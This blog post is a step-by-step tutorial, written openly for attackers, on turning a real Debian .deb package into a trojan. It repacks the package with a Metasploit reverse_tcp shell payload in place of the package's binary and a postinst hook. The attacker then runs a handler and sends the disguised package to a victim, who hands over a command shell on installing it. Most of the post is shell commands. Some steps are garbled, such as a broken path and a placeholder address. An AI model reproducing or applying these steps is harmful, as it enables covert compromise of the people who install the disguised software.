Debian Package (Binary Linux Trojan)

On this occasion I will discuss about a debian package (*. deb)
and wrap the payload and the payload instilled into the deb package.
when the victim tried to extract the packet, the attacker also get a command shell victim's computer.

Now create a directory named deb in tmp directory

# mkdir /tmp/deb


Next choose deb package that we will make wrapping payload

# ls /var/cache/apt/archives/


The next copy debian package to the directory /tmp/deb

# cp / var/cache/apt/archives/package_name.deb /tmp/deb/




next extract the package into the work directory

# dpkg -x package_name.deb work



then create a directory named DEBIAN and Show a readable record for the package.

# mkdir work/DEBIAN
# apt-cache show name_package | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > /tmp/deb/work/DEBIAN/control



Now create a new file bash in the directory /tmp/deb/work/DEBIAN/ by name postinst.
until the results look like this:
# cat /tmp/deb/work/DEBIAN/postinst


permission a file :
# chmod 755 /tmp/deb/work/DEBIAN/postinst


now, created payload and embedded to package deb
# msfpayload linux/x86/shell/reverse_tcp LHOST=PI-Address LPORT=4444 X > /tmp/deb/work/usr/bin/package_name


now, Build an archive package to /tmp/deb/work/ directory
# dpkg-deb --build  /tmp/deb/work/


once completed, it will display a new package named work.deb

Now. move work.deb packets to the previous packet

# mv work.deb package_name.deb


The next stage is only running multi handler and sends the packet to the target

The following example if the victim installs the package:



and look back at the terminal console on your computer


Game Over

Regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux